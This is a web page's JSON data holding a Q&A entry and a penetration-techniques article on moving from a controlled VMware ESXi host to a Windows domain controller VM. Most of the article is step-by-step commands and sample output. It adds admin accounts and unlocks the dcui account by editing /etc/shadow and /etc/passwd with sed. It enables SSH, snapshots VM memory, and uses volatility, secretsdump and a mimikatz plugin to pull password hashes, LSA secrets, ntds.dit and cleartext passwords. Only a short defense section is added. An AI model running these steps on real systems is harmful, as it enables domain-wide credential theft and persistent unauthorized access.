[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fL4lKyfNA37P9cwAjz60JV3R3cqvvgFbubkQnWkfUDuk":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":33,"aiModel":30,"aiConfidence":30,"updatedAt":50,"createdAt":50,"_status":49},542,"How can an attacker use VMware ESXi snapshot files to extract credentials from a Windows domain controller VM?","An attacker with control over VMware ESXi can create a snapshot of a target Windows virtual machine (including memory) using commands like `vim-cmd vmsvc\u002Fsnapshot.create`. The resulting `.vmem` file (which captures the VM's RAM) can then be analyzed with the forensic tool [volatility](https:\u002F\u002Fgithub.com\u002Fvolatilityfoundation\u002Fvolatility). By running plugins such as `hashdump` and `lsadump` against the snapshot, the attacker retrieves local user password hashes and LSA secrets. This technique enables lateral movement from the hypervisor to the guest OS, similar to other post-exploitation lateral movement methods like [exploiting net session](\u002Fnews\u002Fpenetration-techniques-exploitation-of-net-session-in-windows) or [using WMIC](\u002Fnews\u002Fpenetration-basics-usage-of-wmic).","\u003Cp>An attacker with control over VMware ESXi can create a snapshot of a target Windows virtual machine (including memory) using commands like `vim-cmd vmsvc\u002Fsnapshot.create`. The resulting `.vmem` file (which captures the VM&#39;s RAM) can then be analyzed with the forensic tool [volatility](https:\u002F\u002Fgithub.com\u002Fvolatilityfoundation\u002Fvolatility). By running plugins such as `hashdump` and `lsadump` against the snapshot, the attacker retrieves local user password hashes and LSA secrets. This technique enables lateral movement from the hypervisor to the guest OS, similar to other post-exploitation lateral movement methods like [exploiting net session](\u002Fnews\u002Fpenetration-techniques-exploitation-of-net-session-in-windows) or [using WMIC](\u002Fnews\u002Fpenetration-basics-usage-of-wmic).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-lateral-movement-from-vmware-esxi-to-windows-virtual-machines\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-use-vmware-esxi-snapshot-files-to-extract-credentials-from-a-1777483134596","VMware ESXi, snapshot, lateral movement, volatility, hashdump, lsadump, credential extraction, domain controller, vmem",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":27,"cover":30,"author":31,"views":19,"readingTime":32,"status":33,"publishedAt":34,"seo":35,"tags":39,"qaPairs":40,"meta":46,"updatedAt":47,"createdAt":48,"_status":49},134,"Penetration Techniques - Lateral Movement from VMware ESXI to Windows Virtual Machines","penetration-techniques-lateral-movement-from-vmware-esxi-to-windows-virtual-machines","Learn how to move laterally from VMware ESXI to Windows VMs using snapshot techniques, commands, and volatility analysis for security testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Assume the following test environment: We have obtained control permissions of the internal VMware ESXI and discovered that a Windows domain controller server is installed on VMware ESXI.\u003C\u002Fp>\u003Cp>This article only introduces the method of lateral movement from VMware ESXI to this Windows domain controller server from a technical research perspective, combining exploitation ideas and providing defense detection methods.\u003C\u002Fp>\u003Ch2>0x02 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Exploitation Ideas\u003C\u002Fli>\u003Cli>Common Commands\u003C\u002Fli>\u003Cli>Implementation Methods\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation Ideas\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Manage virtual machines through VMware ESXI, create snapshot files, and extract valuable information from the snapshot files.\u003C\u002Fp>\u003Ch2>0x04 Common Commands\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Check Virtual Machine Version\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vmware -vl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. User Information Related\u003C\u002Fh3>\u003Ch4>(1) View All Users\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>esxcli system account list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) View Administrator Users\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>esxcli system permission list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Add User\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>esxcli system account add -i test1 -p Password@1 -c Password@1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(4) Add Regular User as Administrator User\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>esxcli system permission set -i test1 -r Admin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) Enable Built-in Administrator Account\u003C\u002Fh4>\u003Cp>By default, dcui is an administrator user but does not allow remote login. You can set the password for the dcui user and enable remote login by modifying the configuration file.\u003C\u002Fp>\u003Cp>Set the dcui user password to Ballot5Twist7upset, input in sequence:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>passwd dcui\u003Cbr>Ballot5Twist7upset\u003Cbr>Ballot5Twist7upset\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>One-click set dcui user password: sed -i 's\u002Fdcui:\\*:13358:0:99999:7:::\u002Fdcui:$6$NaeURj2m.ZplDfbq$LdmyMwxQ7FKh3DS5V\\\u002FzhRQvRvfWzQMSS3wftFwaUsD9IZuxdns.0X.SPx.59bT.kmJOJ\\\u002Fy3zenTmEcoxDVQsS\\\u002F:19160:0:99999:7:::\u002Fg' \u002Fetc\u002Fshadow\u003C\u002Fp>\u003Cp>Enable dcui user remote login:\u003C\u002Fp>\u003Cp>Modify file \u002Fetc\u002Fpasswd, change dcui:x:100:100:DCUI User:\u002F:\u002Fsbin\u002Fnologin to dcui:x:100:100:DCUI User:\u002F:\u002Fbin\u002Fsh\u003C\u002Fp>\u003Cp>One-click enable dcui user remote login: sed -i 's\u002Fdcui:x:100:100:DCUI User:\\\u002F:\\\u002Fsbin\\\u002Fnologin\u002Fdcui:x:100:100:DCUI User:\\\u002F:\\\u002Fbin\\\u002Fsh\u002Fg' \u002Fetc\u002Fpasswd\u003C\u002Fp>\u003Cp>Enable ssh:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd hostsvc\u002Fenable_ssh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Virtual Machine Related\u003C\u002Fh3>\u003Ch4>(1) View all virtual machines\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fgetallvms\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) View the status of a specified virtual machine\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fpower.getstate \u003Cvmid>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Start a specified virtual machine, can be used for power-on and resume from suspended state\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fpower.on \u003Cvmid>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(4) Suspend the specified virtual machine\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fpower.suspend \u003Cvmid>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) Shut down the specified virtual machine\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fpower.off \u003Cvmid>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(6) View the operation log of the specified virtual machine\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fget.tasklist \u003Cvmid>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Virtual Machine Snapshot Related\u003C\u002Fh3>\u003Ch4>(1) View snapshot information of the specified virtual machine\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fget.snapshotinfo \u003Cvmid>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Create a new snapshot\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fsnapshot.create \u003Cvmid> \u003Csnapshotname> \u003Cdescription> \u003Cincludememory> \u003Cquiesced>\u003C\u002Fquiesced>\u003C\u002Fincludememory>\u003C\u002Fdescription>\u003C\u002Fsnapshotname>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example 1:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fsnapshot.create 1 test testsnapshot true true\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cincludememory> set to true indicates including memory; otherwise, the .vmem file cannot be generated\u003C\u002Fincludememory>\u003C\u002Fp>\u003Cp>Example 2:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fsnapshot.create 1 test\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command is equivalent to vim-cmd vmsvc\u002Fsnapshot.create 1 test \"\" false false, does not include memory, and will not generate a .vmem file\u003C\u002Fp>\u003Ch4>(3) Delete Snapshot\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fsnapshot.remove \u003Cvmid> \u003Csnapshotindex>\u003C\u002Fsnapshotindex>\u003C\u002Fvmid>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Implementation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Obtain the VM's vmid\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fgetallvms\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the test environment, the vmid for the virtual machine Windows Domain Controller server obtained from the output is 1\u003C\u002Fp>\u003Ch3>2. View the virtual machine's snapshot information\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fget.snapshotinfo 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>There are no virtual machine snapshots in the test environment\u003C\u002Fp>\u003Ch3>3. Create a snapshot for the virtual machine\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fsnapshot.create 1 test testsnapshot true true\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the test environment, obtain the snapshotIndex of the virtual machine Windows domain controller server from the output as 1\u003C\u002Fp>\u003Ch3>4. Use volatility to analyze the snapshot file\u003C\u002Fh3>\u003Cp>volatility is an open-source forensic analysis software\u003C\u002Fp>\u003Cp>Python2 version address: https:\u002F\u002Fgithub.com\u002Fvolatilityfoundation\u002Fvolatility\u003C\u002Fp>\u003Cp>Python3 version address: https:\u002F\u002Fgithub.com\u002Fvolatilityfoundation\u002Fvolatility3\u003C\u002Fp>\u003Cp>volatility and volatility3 have different command syntax but essentially the same functionality. The latest version is volatility3, but volatility is chosen here for the following reasons:\u003C\u002Fp>\u003Cul>\u003Cli>volatility has a standalone executable program, while volatility3 requires self-compilation\u003C\u002Fli>\u003Cli>volatility has a mimikatz plugin that can extract data from the lsass process, which volatility3 does not support\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(1) Locate the image file\u003C\u002Fh4>\u003Cp>Search for files with the suffix .vmem, command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>find -name *.vmem\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the test environment, the image file location is obtained as .\u002Fvmfs\u002Fvolumes\u002F62a735a8-ad916179-40dd-000c296a0829\u002FDC1\u002FDC1-Snapshot1.vmem\u003C\u002Fp>\u003Ch4>(2) Upload volatility_2.6_lin64_standalone\u003C\u002Fh4>\u003Cp>Download address for volatility_2.6_lin64_standalone:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fdownloads.volatilityfoundation.org\u002Freleases\u002F2.6\u002Fvolatility_2.6_lin64_standalone.zip\u003C\u002Fp>\u003Cp>Analyzing snapshot files requires a .vmem file as a parameter, and .vmem files are typically large. To improve efficiency, volatility is uploaded to VMware ESXi here, and the snapshot file is analyzed on VMware ESXi.\u003C\u002Fp>\u003Ch4>(3) View image information\u003C\u002Fh4>\u003Cp>Obtain the system version through image information, the command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fvolatility_2.6_lin64_standalone -f \".\u002Fvmfs\u002Fvolumes\u002F62a735a8-ad916179-40dd-000c296a0829\u002FDC1\u002FDC1-Snapshot1.vmem\" imageinfo\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the test environment, the obtained Profile is Win2016x64_14393\u003C\u002Fp>\u003Ch4>(4) Obtain local user hash from the registry\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fvolatility_2.6_lin64_standalone -f \".\u002Fvmfs\u002Fvolumes\u002F62a735a8-ad916179-40dd-000c296a0829\u002FDC1\u002FDC1-Snapshot1.vmem\" --profile=\"Win2016x64_14393\" hashdump\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the test environment, the output result:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Administrator:500:aad3b435b51404eeaad3b435b51404ee:58A478135A93AC3BF058A5EA0E8FDB71:::\u003Cbr>Guest:501:aad3b435b51404eeaad3b435b51404ee:58A478135A93AC3BF058A5EA0E8FDB71:::\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) Read LSA Secrets from the registry\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fvolatility_2.6_lin64_standalone -f \".\u002Fvmfs\u002Fvolumes\u002F62a735a8-ad916179-40dd-000c296a0829\u002FDC1\u002FDC1-Snapshot1.vmem\" --profile=\"Win2016x64_14393\" lsadump\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the test environment, the output result:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>NL$KM\u003Cbr>0x00000000  40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   @...............\u003Cbr>0x00000010  ac ab 06 24 e7 5e 13 ba 5b aa b2 d2 a7 d2 b3 cd   ...$.^..[.......\u003Cbr>0x00000020  55 c6 b4 44 cf 9f 72 02 b5 e7 14 66 9e 41 25 35   U..D..r....f.A%5\u003Cbr>0x00000030  a1 6b 50 48 82 35 ea e1 f9 2b a3 c6 9e 15 3b 6b   .kPH.5...+....;k\u003Cbr>0x00000040  9d 3f 8d 29 1a 1a b8 d2 ff ce ba 49 c0 a7 fd ce   .?.).......I....\u003Cbr>0x00000050  7c 7f f5 ec a0 d8 ab a0 75 ea 19 64 b5 af 10 49   |.......u..d...I\u003Cbr>\u003Cbr>DefaultPassword\u003Cbr>0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................\u003Cbr>0x00000010  39 ad ef 46 ad 82 f8 a5 41 65 45 0e 5c 93 bf 73   9..F....AeE.\\..s\u003Cbr>\u003Cbr>DPAPI_SYSTEM\u003Cbr>0x00000000  2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ,...............\u003Cbr>0x00000010  01 00 00 00 d3 63 12 68 2a 9b 93 38 03 79 14 1f   .....c.h*..8.y..\u003Cbr>0x00000020  1a 11 c2 19 9e 86 56 4a b8 aa a1 97 a4 4d 24 14   ......VJ.....M$.\u003Cbr>0x00000030  18 f7 ae 3e 77 62 64 89 f2 e9 88 f2 00 00 00 00   ...&gt;wbd.........\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(6) Export all domain user hashes\u003C\u002Fh4>\u003Cp>Need to download ntds.dit, SYSTEM file, and SECURITY file\u003C\u002Fp>\u003Cp>Locate the ntds.dit file with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fvolatility_2.6_lin64_standalone -f \".\u002Fvmfs\u002Fvolumes\u002F62a735a8-ad916179-40dd-000c296a0829\u002FDC1\u002FDC1-Snapshot1.vmem\" --profile=\"Win2016x64_14393\" filescan |grep ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>0x000000007eff8c20     16      0 R--rw- \\Device\\HarddiskVolume2\\Windows\\System32\\ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Extract the ntds.dit file with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fvolatility_2.6_lin64_standalone -f \".\u002Fvmfs\u002Fvolumes\u002F62a735a8-ad916179-40dd-000c296a0829\u002FDC1\u002FDC1-Snapshot1.vmem\" --profile=\"Win2016x64_14393\" dumpfiles -Q 0x000000007eff8c20 --name file -D \u002Ftmp\u002F\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Then extract the SYSTEM and SECURITY files in sequence. To export all domain user hashes, you can use secretsdump with the command: secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local\u003C\u002Fp>\u003Ch4>(7) Load the mimikatz plugin to read credentials saved in the lsass process\u003C\u002Fh4>\u003Cp>volatility_2.6_lin64_standalone does not support loading the mimikatz plugin. You can choose to download the entire snapshot file (DC1-Snapshot1.vmem) locally, set up a volatility environment, and load the mimikatz plugin\u003C\u002Fp>\u003Cp>Method to install volatility on Kali:\u003C\u002Fp>\u003Col>\u003Cli>Installation\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>apt-get install pcregrep libpcre++-dev python2-dev python-pip -y\u003Cbr>pip2 install pycrypto\u003Cbr>pip2 install distorm3\u003Cbr>git clone https:\u002F\u002Fgithub.com\u002Fvolatilityfoundation\u002Fvolatility.git\u003Cbr>cd volatility\u003Cbr>python2 setup.py install\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>Test volatility\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python2 vol.py -h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>Add mimikatz plugin\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Download URL: https:\u002F\u002Fgithub.com\u002Fvolatilityfoundation\u002Fcommunity\u002Fblob\u002Fmaster\u002FFrancescoPicasso\u002Fmimikatz.py\u003C\u002Fp>\u003Cp>Save mimikatz.py to \u003Cvolatility>\u002Fvolatility\u002Fplugins\u002F\u003C\u002Fvolatility>\u003C\u002Fp>\u003Col>\u003Cli>Install dependencies for mimikatz plugin\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pip2 install construct==2.5.5-reupload\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Do not use pip2 install construct directly here. A higher version of construct will cause an AttributeError: 'module' object has no attribute 'ULInt32' when loading mimikatz.py\u003C\u002Fp>\u003Col>\u003Cli>Test plugin\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python2 vol.py --info | grep mimikatz\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Volatility Foundation Volatility Framework 2.6.1\u003Cbr>mimikatz                   - mimikatz offline\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Installation successful\u003C\u002Fp>\u003Cp>The command to load the mimikatz plugin is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python2 vol.py -f \"DC1-Snapshot1.vmem\" --profile=\"Win2016x64_14393\" mimikatz\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output result:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Module   User             Domain           Password                                \u003Cbr>-------- ---------------- ---------------- ----------------------------------------\u003Cbr>wdigest  admin            DC1              Password@1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Additional note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>To read credentials saved in the lsass process, the following methods can also be used:\u003C\u002Fp>\u003Col>\u003Cli>Convert the image file to a Crash Dump file\u003C\u002Fli>\u003C\u002Fol>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fvolatility_2.6_lin64_standalone -f \".\u002Fvmfs\u002Fvolumes\u002F62a735a8-ad916179-40dd-000c296a0829\u002FDC1\u002FDC1-Snapshot1.vmem\" --profile=\"Win2016x64_14393\" raw2dmp -O copy.dmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Col>\u003Cli>Use Mimilib to export passwords from the dump file\u003C\u002Fli>\u003C\u002Fol>\u003Cp>For detailed methods, please refer to the previous article \"Penetration Techniques - Using Mimilib to Export Passwords from Dump Files\"\u003C\u002Fp>\u003Ch3>5. Delete Snapshot\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vim-cmd vmsvc\u002Fsnapshot.remove 1 5\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x06 Defense and Detection\u003C\u002Fh2>\u003Ch3>1. Defense\u003C\u002Fh3>\u003Cp>Timely update patches for internal VMware ESXI\u003C\u002Fp>\u003Cp>Disable SSH login for internal VMware ESXI\u003C\u002Fp>\u003Ch3>2. Detection\u003C\u002Fh3>\u003Cp>Check internal VMware ESXI login logs\u003C\u002Fp>\u003Cp>Check if the snapshotIndex flag of virtual machine snapshot images is abnormal. For new virtual machines, the snapshotIndex for newly created snapshots increments starting from 1. Deleting snapshot images does not affect snapshotIndex. For example, after deleting a snapshot with snapshotIndex 1, the next created snapshot will have snapshotIndex 2.\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces, from a technical research perspective, methods for lateral movement from VMware ESXI to the Windows domain controller server. It analyzes image files using Volatility, extracts key information, combines exploitation ideas, and provides defense and detection methods.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",7,"published","2026-02-02T07:51:00.062Z",{"title":36,"description":14,"keywords":37,"ogImage":30,"canonicalUrl":30,"noIndex":38},"VMware ESXI to Windows VM Lateral Movement Penetration Techniques","VMware ESXI lateral movement, Windows virtual machine penetration, snapshot extraction, volatility analysis, ESXI commands, cybersecurity",false,[],{"docs":41,"hasNextPage":38},[42,43,44,45,4],546,545,544,543,{"title":30,"description":30,"image":30},"2026-07-24T02:07:22.763Z","2026-07-23T16:01:43.789Z","draft","2026-07-23T16:13:09.877Z"]